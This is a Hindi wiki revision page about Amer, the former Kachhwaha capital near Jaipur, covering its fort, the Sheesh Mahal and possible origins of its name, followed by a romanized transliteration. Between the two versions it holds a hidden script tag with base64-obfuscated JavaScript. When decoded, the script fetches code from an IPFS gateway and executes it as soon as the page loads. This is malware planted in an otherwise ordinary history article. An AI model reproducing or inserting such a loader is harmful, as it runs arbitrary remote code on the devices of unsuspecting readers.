Difference between revisions of "आमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(आमेर का क़िला जयपुर को अनुप्रेषित (रिडायरेक्ट))
Line 1: Line 1:
#REDIRECT [[आमेर का क़िला जयपुर]]
+
{{पुनरीक्षण}}
 +
'''आमेर''' [[राजस्थान]] [[राज्य]] के [[जयपुर ज़िला|जयपुर ज़िले]] से छ: मील दूर जयपुर राज्य की प्राचीन राजधानी था। कहा जाता है कि 1129 ई. के लगभग कछवाहा [[राजपूत|राजपूतों]] को [[ग्वालियर]] से परिहारों ने निकाल दिया था। कछवाहा राजकुमार तेजकरों अपनी नवोढ़ा पत्नी सुन्दरी मरोनी के प्रेमपाश में बंध कर राजकाज भूल बैठा था जिसके फलस्वरूप उसके भतीजे परिहार ने उसे राज्यच्युत कर दिया। कछवाहों ने निष्कासित होने के पश्चात् जंगली मीनाओं की सहायता से ढुंढार की रियासत स्थापित की। आमेर ढुंढार ही को राजधानी थी। जयसिंह-द्वितीय के समय तक<ref>1730 ई. के कुछ पूर्व</ref> कछवाहों की राजधानी आमेर नगर में ही रही। जयसिंह द्वितीय ने ही [[जयपुर]] बसाया और अपनी राजधानी नए नगर में बनाई। आमेर में [[अकबर]] के दरबार के [[अकबर के नवरत्न|रत्न]] [[मानसिंह|महाराजा मानसिंह]] द्वारा निर्मित दुर्ग और प्रासाद पहाड़ी के ऊपर स्थित हैं। इनके भीतर दरबार, दीवाने-आम, गणेशपोल, रंगमहल, यशमंदिर, सुहाग मंदिर इत्यादि उल्लेखनीय हैं। कहते हैं कि [[आमेर का क़िला जयपुर|आमेर के भवनों]] की नक़्क़ाशी [[मुग़ल]] सम्राटों को इतनी भायी कि उसी का अनुकरण उन्होंने [[दिल्ली]] और [[आगरा]] के भवनों में किया। आमेर के दुर्ग का शीशमहल [[भारत]] में प्रसिद्ध है; इसी के लिए [[जयसिंह|जयसिंह प्रथम]] के राजकवि [[बिहारीलाल]] ने लिखा था-
 +
<blockquote><poem>'प्रतिबिंबित जयसाह दुति दीपत दरपन धाम,
 +
सब जग जीतन को कियो कामव्यूह मनु काम'।</poem></blockquote>
 +
आमेर का कालीमंदिर बहुत प्राचीन है। संभवत: कछवाहों के आमेर में बसने के पूर्वकाली यहां रहने वाली मीना जाति की इष्टदेवी थी। आमेर नाम की व्युत्पत्ति भी अंबानगर से जान पड़ती है। श्री न. ला. डे के अनुसार आमेर का असली नाम अंबरीषपुर था और इसे पौराणि क नरेश अंबरीष ने बसाया था।
 +
{{संदर्भ ग्रंथ}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==बाहरी कड़ियाँ==
 +
==संबंधित लेख==
 +
{{राजस्थान के ऐतिहासिक स्थान}}
 +
[[Category:राजस्थान]]
 +
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 +
[[Category:ऐतिहासिक_स्थान_कोश]]
 +
 
 +
__INDEX__

Revision as of 08:34, 18 October 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

amer rajasthan rajy ke jayapur zile se chh: mil door jayapur rajy ki prachin rajadhani tha. kaha jata hai ki 1129 ee. ke lagabhag kachhavaha rajapootoan ko gvaliyar se pariharoan ne nikal diya tha. kachhavaha rajakumar tejakaroan apani navodha patni sundari maroni ke premapash mean bandh kar rajakaj bhool baitha tha jisake phalasvaroop usake bhatije parihar ne use rajyachyut kar diya. kachhavahoan ne nishkasit hone ke pashchath jangali minaoan ki sahayata se dhuandhar ki riyasat sthapit ki. amer dhuandhar hi ko rajadhani thi. jayasianh-dvitiy ke samay tak[1] kachhavahoan ki rajadhani amer nagar mean hi rahi. jayasianh dvitiy ne hi jayapur basaya aur apani rajadhani ne nagar mean banaee. amer mean akabar ke darabar ke ratn maharaja manasianh dvara nirmit durg aur prasad paha di ke oopar sthit haian. inake bhitar darabar, divane-am, ganeshapol, rangamahal, yashamandir, suhag mandir ityadi ullekhaniy haian. kahate haian ki amer ke bhavanoan ki naqqashi mugal samratoan ko itani bhayi ki usi ka anukaran unhoanne dilli aur agara ke bhavanoan mean kiya. amer ke durg ka shishamahal bharat mean prasiddh hai; isi ke lie jayasianh pratham ke rajakavi biharilal ne likha tha-

'pratibianbit jayasah duti dipat darapan dham,
sab jag jitan ko kiyo kamavyooh manu kam'.

amer ka kalimandir bahut prachin hai. sanbhavat: kachhavahoan ke amer mean basane ke poorvakali yahaan rahane vali mina jati ki ishtadevi thi. amer nam ki vyutpatti bhi aanbanagar se jan p dati hai. shri n. la. de ke anusar amer ka asali nam aanbarishapur tha aur ise paurani k naresh aanbarish ne basaya tha.

tika tippani aur sandarbh

  1. 1730 ee. ke kuchh poorv

bahari k diyaan

sanbandhit lekh